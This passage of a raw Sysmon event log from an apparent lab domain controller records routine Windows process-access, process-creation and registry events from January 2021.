13:34:56.346{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.346{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.346{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.299{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.299{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.267{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.267{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.252{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4880-6000-5A05-000000009A01}2272C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4880-6000-5A05-000000009A01}2272C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4880-6000-5A05-000000009A01}2272C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.236{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4880-6000-5A05-000000009A01}2272C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.237{08A6967A-4880-6000-5A05-000000009A01}2272C:\Windows\System32\InstallAgent.exe10.0.14393.3930 (rs1_release.200901-1914)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=A1BA1789A4ED6CDB5A0060984497C7D0,SHA256=EA073DFA2D2AC789F08DD1A91166FBFA6B90A92DC4091429ADC4F25DCFC3D1BC,IMPHASH=6303FC47B48DC01C8FC862BCA8D40657{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000013533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.111{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.111{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.111{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.111{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.111{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:35:01.049{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x800000000000000013554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:35:01.033{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x800000000000000013553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:35:01.033{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 13241300x800000000000000013556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:35:04.580{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea7a-0x10fb1091) 13241300x800000000000000013557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1042SetValue2021-01-14 13:35:11.518{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXEHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 10341000x800000000000000013573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4893-6000-5C05-000000009A01}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 